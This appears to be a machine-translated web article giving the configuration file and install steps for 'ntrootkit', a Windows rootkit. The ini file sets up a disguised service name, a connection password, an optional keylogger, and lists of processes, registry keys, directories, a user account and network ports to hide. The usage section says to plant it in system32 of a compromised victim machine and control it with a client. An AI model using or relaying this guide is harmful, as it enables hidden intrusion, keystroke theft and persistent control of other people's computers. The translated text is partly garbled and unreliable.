Get the App
SLTechnology News&Howtos  ›  Network Security  › 

The configuration of Rootkit's ntrootkit uses

Shulou Source: shulou.com Published: 2022-06-01 07:52:15 10月02日 Update

NTrootkit

First, configuration method

\\ filename:ntrootkit.ini

\\ This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit

\\ can't be installedhands!

[GLOBAL] / / the following is the configuration

\\ servicename is the ntrootkit's servicename

Servicename=tsserver / / Service name

Servdispname=rpcsvr

Servdescription=windows system rpc server

Installdir=com\ sserver / / installation directory

Connpass=12345 / / connection password

Appname=51cto.exe

Keylog=0 / / 0 means keyboard is not recorded

Workmode=1 / / 0 is sniffer mode

[HIDDEN PROCNAME] / / Service name to be hidden

51cto

[HIDDEN REGKEY] / / Registry keys to be hidden

Zero\ soft\...\...\ xxx

[HIDDEN REGVALUE] / / Registry key value to be hidden

Zero\ soft\...

[HIDDEN FILEDIR] / / File directory to be hidden

C:\ rootkit

[HIDDEN SERVICE] / / Service name to be hidden

Servicert

[HIDDEN USER] / / user name to hide

Zerosecurity

[HIDDEN TCPPORT] / / tcp port to be hidden

Tcpport=5768

[HIDDEN UDPPORT] / / udp port to be hidden

Udpport=4000

Second, method of use

①: put the configuration file .ini and server ntrootkit.exe in the system32 directory of the broiler, and then run the ntrootkit.exe installation; ntrootkit-u password can be uninstalled

②: clients connect with rtclient

Tags: Service configuration directory file method registry port usage content customer client password mode user user name broiler keyboard run Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno MariaDB Shulou Tech Info Apple macOS Shulou Technology